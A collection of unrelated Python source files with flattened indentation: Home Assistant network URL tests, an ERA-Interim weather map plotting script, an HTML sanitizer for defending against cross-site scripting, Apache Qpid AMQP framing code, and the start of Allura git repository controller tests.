):
"""Test getting current request URL with known hosts addresses."""
hass.config.api = Mock(use_ssl=False, port=8123, local_ip="127.0.0.1")
assert hass.config.internal_url is None
with pytest.raises(NoURLAvailableError):
get_url(hass, require_current_request=True)
# Ensure we accept localhost
with patch(
"homeassistant.helpers.network._get_request_host", return_value="localhost"
):
assert get_url(hass, require_current_request=True) == "http://localhost:8123"
with pytest.raises(NoURLAvailableError):
get_url(hass, require_current_request=True, require_ssl=True)
with pytest.raises(NoURLAvailableError):
get_url(hass, require_current_request=True, require_standard_port=True)
# Ensure we accept local loopback ip (e.g., 127.0.0.1)
with patch(
"homeassistant.helpers.network._get_request_host", return_value="127.0.0.8"
):
assert get_url(hass, require_current_request=True) == "http://127.0.0.8:8123"
with pytest.raises(NoURLAvailableError):
get_url(hass, require_current_request=True, allow_ip=False)
# Ensure hostname from Supervisor is accepted transparently
mock_component(hass, "hassio")
hass.components.hassio.is_hassio = Mock(return_value=True)
hass.components.hassio.get_host_info = Mock(
return_value={"hostname": "homeassistant"}
)
with patch(
"homeassistant.helpers.network._get_request_host",
return_value="homeassistant.local",
):
assert (
get_url(hass, require_current_request=True)
== "http://homeassistant.local:8123"
)
with patch(
"homeassistant.helpers.network._get_request_host",
return_value="homeassistant",
):
assert (
get_url(hass, require_current_request=True) == "http://homeassistant:8123"
)
with patch(
"homeassistant.helpers.network._get_request_host", return_value="unknown.local"
), pytest.raises(NoURLAvailableError):
get_url(hass, require_current_request=True)
async def test_is_internal_request(hass: HomeAssistant):
"""Test if accessing an instance on its internal URL."""
# Test with internal URL: http://example.local:8123
await async_process_ha_core_config(
hass,
{"internal_url": "http://example.local:8123"},
)
assert hass.config.internal_url == "http://example.local:8123"
assert not is_internal_request(hass)
with patch(
"homeassistant.helpers.network._get_request_host", return_value="example.local"
):
assert is_internal_request(hass)
with patch(
"homeassistant.helpers.network._get_request_host",
return_value="no_match.example.local",
):
assert not is_internal_request(hass)
# Test with internal URL: http://192.168.0.1:8123
await async_process_ha_core_config(
hass,
{"internal_url": "http://192.168.0.1:8123"},
)
assert hass.config.internal_url == "http://192.168.0.1:8123"
assert not is_internal_request(hass)
with patch(
"homeassistant.helpers.network._get_request_host", return_value="192.168.0.1"
):
assert is_internal_request(hass)
|
|
import matplotlib
#matplotlib.use('Agg') # Must be before importing matplotlib.pyplot or pylab!
from matplotlib import rc
from matplotlib.font_manager import FontProperties
from matplotlib import rcParams
from matplotlib import cm
from mpl_toolkits.basemap import Basemap
from mpl_toolkits.basemap import cm
import cPickle as pickle
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.colors as colors
from matplotlib.patches import Polygon
import scipy.interpolate
import datetime
import pdb
import gc
rc('font', family = 'serif', serif = 'cmr10')
rc('text', usetex=True)
rcParams['text.usetex']=True
rcParams['text.latex.unicode']=True
rcParams['font.family']='serif'
rcParams['font.serif']='cmr10'
rcParams['font.weight']='normal'
rcParams['text.color']='#262626'
#plot_levels = [925, 850, 700, 500]
plot_levels = [925]
plot_type='mean'
plot_diag='precip'
clevpr_min = 0.
clevpr_max = 3.
lon_high_plot = 102
lon_low_plot = 64
lat_high_plot= 30.
lat_low_plot=-10
divisor=10 # for lat/lon rounding
geop_file = np.load('/nfs/a90/eepdw/Data/Era_Interim/Era_Interim_Daily_Geopotential_Height_EMBRACE_Period.npz')
precip_file = np.load('/nfs/a90/eepdw/Data/Era_Interim/Era_Interim_Daily_Total_Precip_EMBRACE_Period.npz')
# convert geopotential to geopotential height
# Calculate total at each lat,lon position
#mean_dom = np.mean(pcp_dom, axis=0)
#sum_dom = np.sum(pcp_dom, axis=0)
#lons= longitude_domsingle[:]
#lats = latitude_domsingle[:]
#lon_low= np.min(lons)
#lon_high = np.max(lons)
#lat_low = np.min(lats)
#lat_high = np.max(lats)
#lons,lats = np.meshgrid(lons, lats)
geopotential = geop_file['data']
variable = precip_file['data']
lons_geop = geop_file['longitudes']
lats_geop = geop_file['latitudes']
lons_var = precip_file['longitudes']
lats_var = precip_file['latitudes']
pressure_levels = geop_file['pressures']
geop_dates=[datetime.datetime.strptime(g, '%Y-%m-%d') for g in geop_file['time_coords']]
var_dates=[datetime.datetime.strptime(g, '%Y-%m-%d') for g in precip_file['time_coords']]
#pdb.set_trace()
for p in plot_levels:
# Find index of plot level in datasets
s = np.searchsorted(pressure_levels[::-1], p)
for date in geop_dates:
dg = np.searchsorted(geop_dates, date)
dv = np.searchsorted(var_dates, date)
# Get plot grids on pressure level
# /9.81 to convert geopotential to geopotential height
plt_h = geopotential[dg, -(s+1),:,:]/9.81
#plt_v = variable[-(s+1),:,:]
plt_v = variable[dv,:,:]
# Set pressure height contour min/max
if p == 925:
clev_min = 660.
clev_max = 810.
elif p == 850:
clev_min = 1435.
clev_max = 1530.
elif p == 700:
clev_min = 3090.
clev_max = 3155.
elif p == 500:
clev_min = 5800.
clev_max = 5890.
else:
print 'Contour min/max not set for this pressure level'
m_title = 'Height of %s-hPa level (m)' % (p)
# Set precip min/max
clevs_lin = np.arange(clev_min, clev_max, 5)
m =\
Basemap(llcrnrlon=lon_low_plot,llcrnrlat=lat_low_plot,urcrnrlon=lon_high_plot,urcrnrlat=lat_high_plot,projection='mill', rsphere=6371229)
#pdb.set_trace()
x, y = m(lons_geop, lats_geop)
x_v, y_v = m(lons_var, lats_var)
fig=plt.figure(figsize=(8,8))
ax = fig.add_axes([0.05,0.05,0.9,0.85])
# draw coastlines, state and country boundaries, edge of map.
m.drawcoastlines(linewidth=0.5,color='#262626')
#m.drawstates()
m.drawcountries(linewidth=0.5,color='#262626')
# draw parallels.
parallels = np.arange(0.,90,divisor)
m.drawparallels(parallels,labels=[1,0,0,0],fontsize=10, color='#262626' )
# draw meridians
meridians = np.arange(0.,360., divisor)
m.drawmeridians(meridians,labels=[0,0,0,1],fontsize=10, color='#262626')
#ny = mean_dom.shape[0]; nx = mean_dom.shape[1]
#lons, lats = m.makegrid(longitude_dom[1,:], latitude_dom[1,:]) # get lat/lons of ny by nx evenly space grid.
# draw geopotential contour lines
cs_lin = m.contour(x,y, plt_h, clevs_lin,colors='#262626',linewidths=0.5)
if plot_diag=='precip':
clevspt_nums=64
plt_v = np.ma.masked_outside(plt_v, clevpr_max+0.5, clevpr_min-0.5)
tick_gap=0.2
cs_col = m.contourf(x_v,y_v, plt_v*1000/6, np.linspace(clevpr_min, clevpr_max, clevspt_nums), cmap=cm.s3pcpn_l, extend='both')
#cbar = m.colorbar(cs_col,location='bottom',pad="5%")
#cbar.ax.tick_params(labelsize=12, colors='#262626')
tick_gap=0.5
#ticks= np.arange(int(clevpr_min),int(clevpr_max)+tick_gap,tick_gap)
#cbar.set_ticks(ticks, update_ticks=True)
#cbar.set_ticklabels(([r"${%s}$" % x for x in ticks]))
#cbar.set_label('Precipitation mm h$^{-1}$', fontsize=12, color='#262626')
#plt.suptitle('Height of %s hPa, and Total Precipitation' % (p), fontsize=16, color='#262626')
elif plot_diag=='temperature':
clevspt_nums=clevpt_max-clevpt_min+1
plt_v = np.ma.masked_outside(plt_v, clevpt_max+20, clevpt_min-20)
tick_gap=2
cs_col = m.contourf(x,y, plt_v, np.linspace(clevpt_min, clevpt_max, clevspt_nums), cmap=plt.cm.jet, extend='both')
cbar = m.colorbar(cs_col,location='bottom',pad="5%")
#cbar.ax.tick_params(labelsize=12, colors='#262626')
tick_gap=2
ticks= np.arange(int(clevpt_min),int(clevpt_max)+tick_gap,tick_gap)
cbar.set_ticks(ticks, update_ticks=True)
cbar.set_ticklabels(([r"${%s}$" % x for x in ticks]))
cbar.set_label('Potential Temperature ${\\theta}$(K)', fontsize=12, color='#262626')
plt.suptitle('Height, Potential Temperature and Wind Vectors at %s hPa'% (p), fontsize=16, color='#262626')
elif plot_diag=='sphum':
clevssh_nums=clevpt_max-clevpt_min+1
plt_v = np.ma.masked_outside(plt_v, clevsh_max+20, clevsh_min-20)
cs_col = m.contourf(x,y, plt_v, np.linspace(clevsh_min, clevsh_max, clevssh_nums), cmap=plt.cm.jet_r, extend='both')
cbar = m.colorbar(cs_col,location='bottom',pad="5%", format = '%.3f')
tick_gap=0.002
ticks= np.arange(clevsh_min,clevsh_max+tick_gap,tick_gap)
cbar.set_ticks(ticks)
cbar.set_ticklabels((["${%.3f}$" % x for x in ticks]) )
cbar.set_label('Specific Humidity ${\\phi}$(kg/kg)', fontsize=12, color='#262626')
plt.suptitle('Height, Specific Humidity and Wind Vectors at %s hPa'% (p), fontsize=16, color='#262626')
elif plot_diag=='vort':
clevvort_min = -5
clevvort_max = 5
cs_col = m.contourf(x,y, plt_v*(10**5), np.linspace(clevvort_min, clevvort_max), cmap=plt.cm.RdBu_r, extend='both')
cbar = m.colorbar(cs_col,location='bottom',pad="5%", format = '%i')
tick_gap=1
ticks= np.arange(clevvort_min,clevvort_max+tick_gap,tick_gap)
cbar.set_ticks(ticks)
cbar.set_ticklabels((["${%i}$" % x for x in ticks]) )
cbar.set_label('Relative Vorticity (${10^{-5}\ s^{-1}}$)', fontsize=12, color='#262626')
plt.suptitle('Height, Relative Vorticity and Wind Vectors at %s hPa'% (p), fontsize=16, color='#262626')
elif plot_diag=='ptvort':
clevvort_min = -0.1
clevvort_max = 0.5
cs_col = m.contourf(x,y, plt_v*(10**6), np.linspace(clevvort_min, clevvort_max), cmap=plt.cm.RdBu_r, extend='both')
cbar = m.colorbar(cs_col,location='bottom',pad="5%")
#K m**2 kg**-1 s**-1
tick_gap=0.1
ticks= np.arange(clevvort_min,clevvort_max+tick_gap,tick_gap)
cbar.set_ticks(ticks)
cbar.set_ticklabels((["${%.1f}$" % x for x in ticks]) )
cbar.set_label('Potential Vorticity (${K\ m^{2}\ kg^{-1}\ s^{-1}}$)', fontsize=12, color='#262626')
plt.suptitle('Height, Potential Vorticity and Wind Vectors at %s hPa'% (p), fontsize=16, color='#262626')
elif plot_diag=='div':
clevvort_min = -1.5
clevvort_max = 1.5
cs_col = m.contourf(x,y, plt_v*(10**5), np.linspace(clevvort_min, clevvort_max), cmap=plt.cm.RdBu_r, extend='both')
cbar = m.colorbar(cs_col,location='bottom',pad="5%")
tick_gap=0.3
ticks= np.arange(clevvort_min,clevvort_max+tick_gap,tick_gap)
cbar.set_ticks(ticks)
cbar.set_ticklabels((["${%.1f}$" % x for x in ticks]) )
cbar.set_label('Divergence of Wind (${s^{-1}}$)', fontsize=12, color='#262626')
plt.suptitle('Height, Divergence and Wind Vectors at %s hPa'% (p), fontsize=16, color='#262626')
plt.clabel(cs_lin, fontsize=10, fmt="${%i}$", color='#262626')
# cbar.ax.tick_params(labelsize=10, color='#262626', ')
plt.title('%s UTC' % (datetime.datetime.strftime(date, '%d%b')))
#plt.show()
plt.savefig('/nfs/a90/eepdw/Figures/ERA_Interim/Era_Interim_mean_EMBRACE_period_%shPa_height_and_rain_by_day_%s_%s_shorttitle.png' % (p,plot_diag, datetime.datetime.strftime(date, '%d%b')), format='png', bbox_inches='tight')
plt.clf()
plt.close()
gc.collect()
#plt.title('TRMM Ra for EMBRACE Period ' , fontsize=16, color='#262626')
#plt.savefig('/nfs/a90/eepdw/Figures/ERA_Interim/Era_Interim_mean_EMBRACE_period_%shPa_%s.png' % (p,plot_diag), format='png', bbox_inches='tight')
#plt.suptitle('', visible=False)
#plt.savefig('/nfs/a90/eepdw/Figures/ERA_Interim/Era_Interim_mean_EMBRACE_period_%shPa_%s_notitle.png' % (p,plot_diag), format='png', bbox_inches='tight')
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
::
# from http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/496942
# Title: Cross-site scripting (XSS) defense
# Submitter: Josh Goldfoot (other recipes)
# Last Updated: 2006/08/05
# Version no: 1.0
"""
from htmllib import HTMLParser
from cgi import escape
from urlparse import urlparse
from formatter import AbstractFormatter
from htmlentitydefs import entitydefs
from xml.sax.saxutils import quoteattr
__all__ = ['sanitize']
def xssescape(text):
"""Gets rid of < and > and & and, for good measure, :"""
return escape(text, quote=True).replace(':', ':')
class XssCleaner(HTMLParser):
def __init__(
self,
permitted_tags=[
'a',
'b',
'blockquote',
'br/',
'i',
'li',
'ol',
'ul',
'p',
'cite',
'code',
'pre',
'img/',
],
allowed_attributes={'a': ['href', 'title'], 'img': ['src', 'alt'
], 'blockquote': ['type']},
fmt=AbstractFormatter,
strip_disallowed = False
):
HTMLParser.__init__(self, fmt)
self.result = ''
self.open_tags = []
self.permitted_tags = [i for i in permitted_tags if i[-1] != '/']
self.requires_no_close = [i[:-1] for i in permitted_tags
if i[-1] == '/']
self.permitted_tags += self.requires_no_close
self.allowed_attributes = allowed_attributes
# The only schemes allowed in URLs (for href and src attributes).
# Adding "javascript" or "vbscript" to this list would not be smart.
self.allowed_schemes = ['http', 'https', 'ftp']
#to strip or escape disallowed tags?
self.strip_disallowed = strip_disallowed
self.in_disallowed = False
def handle_data(self, data):
if data and not self.in_disallowed:
self.result += xssescape(data)
def handle_charref(self, ref):
if self.in_disallowed:
return
elif len(ref) < 7 and ref.isdigit():
self.result += '&#%s;' % ref
else:
self.result += xssescape('&#%s' % ref)
def handle_entityref(self, ref):
if self.in_disallowed:
return
elif ref in entitydefs:
self.result += '&%s;' % ref
else:
self.result += xssescape('&%s' % ref)
def handle_comment(self, comment):
if self.in_disallowed:
return
elif comment:
self.result += xssescape('<!--%s-->' % comment)
def handle_starttag(
self,
tag,
method,
attrs,
):
if tag not in self.permitted_tags:
if self.strip_disallowed:
self.in_disallowed = True
else:
self.result += xssescape('<%s>' % tag)
else:
bt = '<' + tag
if tag in self.allowed_attributes:
attrs = dict(attrs)
self.allowed_attributes_here = [x for x in
self.allowed_attributes[tag] if x in attrs
and len(attrs[x]) > 0]
for attribute in self.allowed_attributes_here:
if attribute in ['href', 'src', 'background']:
if self.url_is_acceptable(attrs[attribute]):
bt += ' %s="%s"' % (attribute,
attrs[attribute])
else:
bt += ' %s=%s' % (xssescape(attribute),
quoteattr(attrs[attribute]))
if bt == '<a' or bt == '<img':
return
if tag in self.requires_no_close:
bt += ' /'
bt += '>'
self.result += bt
self.open_tags.insert(0, tag)
def handle_endtag(self, tag, attrs):
bracketed = '</%s>' % tag
if tag not in self.permitted_tags:
if self.strip_disallowed:
self.in_disallowed = False
else:
self.result += xssescape(bracketed)
elif tag in self.open_tags:
self.result += bracketed
self.open_tags.remove(tag)
def unknown_starttag(self, tag, attributes):
self.handle_starttag(tag, None, attributes)
def unknown_endtag(self, tag):
self.handle_endtag(tag, None)
def url_is_acceptable(self, url):
"""
Accepts relative and absolute urls
"""
parsed = urlparse(url)
return (parsed[0] in self.allowed_schemes and '.' in parsed[1]) \
or (parsed[0] == '' and parsed[2].startswith('/'))
def strip(self, rawstring, escape=True):
"""
Returns the argument stripped of potentially harmful
HTML or Javascript code
@type escape: boolean
@param escape: If True (default) it escapes the potentially harmful
content, otherwise remove it
"""
if not isinstance(rawstring, str): return str(rawstring)
for tag in self.requires_no_close:
rawstring = rawstring.replace("<%s/>" % tag, "<%s />" % tag)
if not escape:
self.strip_disallowed = True
self.result = ''
self.feed(rawstring)
for endtag in self.open_tags:
if endtag not in self.requires_no_close:
self.result += '</%s>' % endtag
return self.result
def xtags(self):
"""
Returns a printable string informing the user which tags are allowed
"""
tg = ''
for x in sorted(self.permitted_tags):
tg += '<' + x
if x in self.allowed_attributes:
for y in self.allowed_attributes[x]:
tg += ' %s=""' % y
tg += '> '
return xssescape(tg.strip())
def sanitize(text, permitted_tags=[
'a',
'b',
'blockquote',
'br/',
'i',
'li',
'ol',
'ul',
'p',
'cite',
'code',
'pre',
'img/',
'h1','h2','h3','h4','h5','h6',
'table','tr','td','div',
],
allowed_attributes = {
'a': ['href', 'title'],
'img': ['src', 'alt'],
'blockquote': ['type'],
'td': ['colspan'],
},
escape=True):
if not isinstance(text, str): return str(text)
return XssCleaner(permitted_tags=permitted_tags,
allowed_attributes=allowed_attributes).strip(text, escape)
|
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
"""
A Connection class containing socket code that uses the spec metadata
to read and write Frame objects. This could be used by a client,
server, or even a proxy implementation.
"""
import socket, codec, logging, qpid
from cStringIO import StringIO
from codec import EOF
from compat import SHUT_RDWR
from exceptions import VersionError
from logging import getLogger, DEBUG
log = getLogger("qpid.connection08")
class SockIO:
def __init__(self, sock):
self.sock = sock
def write(self, buf):
if log.isEnabledFor(DEBUG):
log.debug("OUT: %r", buf)
self.sock.sendall(buf)
def read(self, n):
data = ""
while len(data) < n:
try:
s = self.sock.recv(n - len(data))
except socket.error:
break
if len(s) == 0:
break
data += s
if log.isEnabledFor(DEBUG):
log.debug("IN: %r", data)
return data
def flush(self):
pass
def close(self):
self.sock.shutdown(SHUT_RDWR)
self.sock.close()
def connect(host, port):
sock = socket.socket()
sock.connect((host, port))
sock.setblocking(1)
return SockIO(sock)
def listen(host, port, predicate = lambda: True):
sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((host, port))
sock.listen(5)
while predicate():
s, a = sock.accept()
yield SockIO(s)
class FramingError(Exception):
pass
class Connection:
def __init__(self, io, spec):
self.codec = codec.Codec(io, spec)
self.spec = spec
self.FRAME_END = self.spec.constants.byname["frame_end"].id
self.write = getattr(self, "write_%s_%s" % (self.spec.major, self.spec.minor))
self.read = getattr(self, "read_%s_%s" % (self.spec.major, self.spec.minor))
def flush(self):
self.codec.flush()
INIT="!4s4B"
def init(self):
self.codec.pack(Connection.INIT, "AMQP", 1, 1, self.spec.major,
self.spec.minor)
def tini(self):
self.codec.unpack(Connection.INIT)
def write_8_0(self, frame):
c = self.codec
c.encode_octet(self.spec.constants.byname[frame.type].id)
c.encode_short(frame.channel)
body = StringIO()
enc = codec.Codec(body, self.spec)
frame.encode(enc)
enc.flush()
c.encode_longstr(body.getvalue())
c.encode_octet(self.FRAME_END)
def read_8_0(self):
c = self.codec
tid = c.decode_octet()
try:
type = self.spec.constants.byid[tid].name
except KeyError:
if tid == ord('A') and c.unpack("!3s") == "MQP":
_, _, major, minor = c.unpack("4B")
raise VersionError("client: %s-%s, server: %s-%s" %
(self.spec.major, self.spec.minor, major, minor))
else:
raise FramingError("unknown frame type: %s" % tid)
try:
channel = c.decode_short()
body = c.decode_longstr()
dec = codec.Codec(StringIO(body), self.spec)
frame = Frame.DECODERS[type].decode(self.spec, dec, len(body))
frame.channel = channel
end = c.decode_octet()
if end != self.FRAME_END:
garbage = ""
while end != self.FRAME_END:
garbage += chr(end)
end = c.decode_octet()
raise "frame error: expected %r, got %r" % (self.FRAME_END, garbage)
return frame
except EOF:
# An EOF caught here can indicate an error decoding the frame,
# rather than that a disconnection occurred,so it's worth logging it.
log.exception("Error occurred when reading frame with tid %s" % tid)
raise
def write_0_9(self, frame):
self.write_8_0(frame)
def read_0_9(self):
return self.read_8_0()
def write_0_91(self, frame):
self.write_8_0(frame)
def read_0_91(self):
return self.read_8_0()
def write_0_10(self, frame):
c = self.codec
flags = 0
if frame.bof: flags |= 0x08
if frame.eof: flags |= 0x04
if frame.bos: flags |= 0x02
if frame.eos: flags |= 0x01
c.encode_octet(flags) # TODO: currently fixed at ver=0, B=E=b=e=1
c.encode_octet(self.spec.constants.byname[frame.type].id)
body = StringIO()
enc = codec.Codec(body, self.spec)
frame.encode(enc)
enc.flush()
frame_size = len(body.getvalue()) + 12 # TODO: Magic number (frame header size)
c.encode_short(frame_size)
c.encode_octet(0) # Reserved
c.encode_octet(frame.subchannel & 0x0f)
c.encode_short(frame.channel)
c.encode_long(0) # Reserved
c.write(body.getvalue())
c.encode_octet(self.FRAME_END)
def read_0_10(self):
c = self.codec
flags = c.decode_octet() # TODO: currently ignoring flags
framing_version = (flags & 0xc0) >> 6
if framing_version != 0:
raise "frame error: unknown framing version"
type = self.spec.constants.byid[c.decode_octet()].name
frame_size = c.decode_short()
if frame_size < 12: # TODO: Magic number (frame header size)
raise "frame error: frame size too small"
reserved1 = c.decode_octet()
field = c.decode_octet()
subchannel = field & 0x0f
channel = c.decode_short()
reserved2 = c.decode_long() # TODO: reserved maybe need to ensure 0
if (flags & 0x30) != 0 or reserved1 != 0 or (field & 0xf0) != 0:
raise "frame error: reserved bits not all zero"
body_size = frame_size - 12 # TODO: Magic number (frame header size)
body = c.read(body_size)
dec = codec.Codec(StringIO(body), self.spec)
try:
frame = Frame.DECODERS[type].decode(self.spec, dec, len(body))
except EOF:
raise "truncated frame body: %r" % body
frame.channel = channel
frame.subchannel = subchannel
end = c.decode_octet()
if end != self.FRAME_END:
garbage = ""
while end != self.FRAME_END:
garbage += chr(end)
end = c.decode_octet()
raise "frame error: expected %r, got %r" % (self.FRAME_END, garbage)
return frame
def write_99_0(self, frame):
self.write_0_10(frame)
def read_99_0(self):
return self.read_0_10()
class Frame:
DECODERS = {}
class __metaclass__(type):
def __new__(cls, name, bases, dict):
for attr in ("encode", "decode", "type"):
if not dict.has_key(attr):
raise TypeError("%s must define %s" % (name, attr))
dict["decode"] = staticmethod(dict["decode"])
if dict.has_key("__init__"):
__init__ = dict["__init__"]
def init(self, *args, **kwargs):
args = list(args)
self.init(args, kwargs)
__init__(self, *args, **kwargs)
dict["__init__"] = init
t = type.__new__(cls, name, bases, dict)
if t.type != None:
Frame.DECODERS[t.type] = t
return t
type = None
def init(self, args, kwargs):
self.channel = kwargs.pop("channel", 0)
self.subchannel = kwargs.pop("subchannel", 0)
self.bos = True
self.eos = True
self.bof = True
self.eof = True
def encode(self, enc): abstract
def decode(spec, dec, size): abstract
class Method(Frame):
type = "frame_method"
def __init__(self, method, args):
if len(args) != len(method.fields):
argspec = ["%s: %s" % (f.name, f.type)
for f in method.fields]
raise TypeError("%s.%s expecting (%s), got %s" %
(method.klass.name, method.name, ", ".join(argspec),
args))
self.method = method
self.method_type = method
self.args = args
self.eof = not method.content
def encode(self, c):
version = (c.spec.major, c.spec.minor)
if version == (0, 10) or version == (99, 0):
c.encode_octet(self.method.klass.id)
c.encode_octet(self.method.id)
else:
c.encode_short(self.method.klass.id)
c.encode_short(self.method.id)
for field, arg in zip(self.method.fields, self.args):
c.encode(field.type, arg)
def decode(spec, c, size):
version = (c.spec.major, c.spec.minor)
if version == (0, 10) or version == (99, 0):
klass = spec.classes.byid[c.decode_octet()]
meth = klass.methods.byid[c.decode_octet()]
else:
klass = spec.classes.byid[c.decode_short()]
meth = klass.methods.byid[c.decode_short()]
args = tuple([c.decode(f.type) for f in meth.fields])
return Method(meth, args)
def __str__(self):
return "[%s] %s %s" % (self.channel, self.method,
", ".join([str(a) for a in self.args]))
class Request(Frame):
type = "frame_request"
def __init__(self, id, response_mark, method):
self.id = id
self.response_mark = response_mark
self.method = method
self.method_type = method.method_type
self.args = method.args
def encode(self, enc):
enc.encode_longlong(self.id)
enc.encode_longlong(self.response_mark)
# reserved
enc.encode_long(0)
self.method.encode(enc)
def decode(spec, dec, size):
id = dec.decode_longlong()
mark = dec.decode_longlong()
# reserved
dec.decode_long()
method = Method.decode(spec, dec, size - 20)
return Request(id, mark, method)
def __str__(self):
return "[%s] Request(%s) %s" % (self.channel, self.id, self.method)
class Response(Frame):
type = "frame_response"
def __init__(self, id, request_id, batch_offset, method):
self.id = id
self.request_id = request_id
self.batch_offset = batch_offset
self.method = method
self.method_type = method.method_type
self.args = method.args
def encode(self, enc):
enc.encode_longlong(self.id)
enc.encode_longlong(self.request_id)
enc.encode_long(self.batch_offset)
self.method.encode(enc)
def decode(spec, dec, size):
id = dec.decode_longlong()
request_id = dec.decode_longlong()
batch_offset = dec.decode_long()
method = Method.decode(spec, dec, size - 20)
return Response(id, request_id, batch_offset, method)
def __str__(self):
return "[%s] Response(%s,%s,%s) %s" % (self.channel, self.id, self.request_id, self.batch_offset, self.method)
def uses_struct_encoding(spec):
return (spec.major == 0 and spec.minor == 10) or (spec.major == 99 and spec.minor == 0)
class Header(Frame):
type = "frame_header"
def __init__(self, klass, weight, size, properties):
self.klass = klass
self.weight = weight
self.size = size
self.properties = properties
self.eof = size == 0
self.bof = False
def __getitem__(self, name):
return self.properties[name]
def __setitem__(self, name, value):
self.properties[name] = value
def __delitem__(self, name):
del self.properties[name]
def encode(self, c):
if uses_struct_encoding(c.spec):
self.encode_structs(c)
else:
self.encode_legacy(c)
def encode_structs(self, c):
# XXX
structs = [qpid.Struct(c.spec.domains.byname["delivery_properties"].type),
qpid.Struct(c.spec.domains.byname["message_properties"].type)]
# XXX
props = self.properties.copy()
for k in self.properties:
for s in structs:
if s.exists(k):
s.set(k, props.pop(k))
if props:
raise TypeError("no such property: %s" % (", ".join(props)))
# message properties store the content-length now, and weight is
# deprecated
if self.size != None:
structs[1].content_length = self.size
for s in structs:
c.encode_long_struct(s)
def encode_legacy(self, c):
c.encode_short(self.klass.id)
c.encode_short(self.weight)
c.encode_longlong(self.size)
# property flags
nprops = len(self.klass.fields)
flags = 0
for i in range(nprops):
f = self.klass.fields.items[i]
flags <<= 1
if self.properties.get(f.name) != None:
flags |= 1
# the last bit indicates more flags
if i > 0 and (i % 15) == 0:
flags <<= 1
if nprops > (i + 1):
flags |= 1
c.encode_short(flags)
flags = 0
flags <<= ((16 - (nprops % 15)) % 16)
c.encode_short(flags)
# properties
for f in self.klass.fields:
v = self.properties.get(f.name)
if v != None:
c.encode(f.type, v)
def decode(spec, c, size):
if uses_struct_encoding(spec):
return Header.decode_structs(spec, c, size)
else:
return Header.decode_legacy(spec, c, size)
def decode_structs(spec, c, size):
structs = []
start = c.nread
while c.nread - start < size:
structs.append(c.decode_long_struct())
# XXX
props = {}
length = None
for s in structs:
for f in s.type.fields:
if s.has(f.name):
props[f.name] = s.get(f.name)
if f.name == "content_length":
length = s.get(f.name)
return Header(None, 0, length, props)
decode_structs = staticmethod(decode_structs)
def decode_legacy(spec, c, size):
klass = spec.classes.byid[c.decode_short()]
weight = c.decode_short()
size = c.decode_longlong()
# property flags
bits = []
while True:
flags = c.decode_short()
for i in range(15, 0, -1):
if flags >> i & 0x1 != 0:
bits.append(True)
else:
bits.append(False)
if flags & 0x1 == 0:
break
# properties
properties = {}
for b, f in zip(bits, klass.fields):
if b:
# Note: decode returns a unicode u'' string but only
# plain '' strings can be used as keywords so we need to
# stringify the names.
properties[str(f.name)] = c.decode(f.type)
return Header(klass, weight, size, properties)
decode_legacy = staticmethod(decode_legacy)
def __str__(self):
return "%s %s %s %s" % (self.klass, self.weight, self.size,
self.properties)
class Body(Frame):
type = "frame_body"
def __init__(self, content):
self.content = content
self.eof = True
self.bof = False
def encode(self, enc):
enc.write(self.content)
def decode(spec, dec, size):
return Body(dec.read(size))
def __str__(self):
return "Body(%r)" % self.content
# TODO:
# OOB_METHOD = "frame_oob_method"
# OOB_HEADER = "frame_oob_header"
# OOB_BODY = "frame_oob_body"
# TRACE = "frame_trace"
# HEARTBEAT = "frame_heartbeat"
|
|
import json
import re
import tg
import pkg_resources
import pylons
pylons.c = pylons.tmpl_context
pylons.g = pylons.app_globals
from pylons import c
from ming.orm import ThreadLocalORMSession
from datadiff.tools import assert_equal
from allura import model as M
from allura.lib import helpers as h
from allura.tests import decorators as td
from alluratest.controller import TestController
class _TestCase(TestController):
def setUp(self):
super(_TestCase, self).setUp()
self.setup_with_tools()
@td.with_git
def setup_with_tools(self):
h.set_context('test', 'src-git', neighborhood='Projects')
repo_dir = pkg_resources.resource_filename(
'forgegit', 'tests/data')
c.app.repo.fs_path = repo_dir
c.app.repo.status = 'ready'
c.app.repo.name = 'testgit.git'
ThreadLocalORMSession.flush_all()
# ThreadLocalORMSession.close_all()
h.set_context('test', 'src-git', neighborhood='Projects')
c.app.repo.refresh()
ThreadLocalORMSession.flush_all()
# ThreadLocalORMSession.close_all()
@td.with_tool('test', 'Git', 'testgit-index', 'Git', type='git')
def setup_testgit_index_repo(self):
h.set_context('test', 'testgit-index', neighborhood='Projects')
repo_dir = pkg_resources.resource_filename(
'forgegit', 'tests/data')
c.app.repo.fs_path = repo_dir
c.app.repo.status = 'ready'
c.app.repo.name = 'testgit_index.git'
ThreadLocalORMSession.flush_all()
h.set_context('test', 'testgit-index', neighborhood='Projects')
c.app.repo.refresh()
ThreadLocalORMSession.flush_all()
class TestRootController(_TestCase):
def test_status(self):
resp = self.app.get('/src-git/status')
d = json.loads(resp.body)
assert d == dict(status='ready')
def test_status_html(self):
resp = self.app.get('/src-git/').follow().follow()
# repo status not displayed if 'ready'
assert None == resp.html.find('div', dict(id='repo_status'))
h.set_context('test', 'src-git', neighborhood='Projects')
c.app.repo.status = 'analyzing'
ThreadLocalORMSession.flush_all()
ThreadLocalORMSession.close_all()
# repo status displayed if not 'ready'
resp = self.app.get('/src-git/').follow().follow()
div = resp.html.find('div', dict(id='repo_status'))
assert div.span.text == 'analyzing'
def test_index(self):
resp = self.app.get('/src-git/').follow().follow()
assert 'git://' in resp
def test_index_empty(self):
self.app.get('/git/')
def test_commit_browser(self):
resp = self.app.get('/src-git/commit_browser')
def test_commit_browser_data(self):
resp = self.app.get('/src-git/commit_browser_data')
data = json.loads(resp.body);
assert data['max_row'] == 3
assert data['next_column'] == 1
assert_equal(data['built_tree']['df30427c488aeab84b2352bdf88a3b19223f9d7a'],
{u'url': u'/p/test/src-git/ci/df30427c488aeab84b2352bdf88a3b19223f9d7a/',
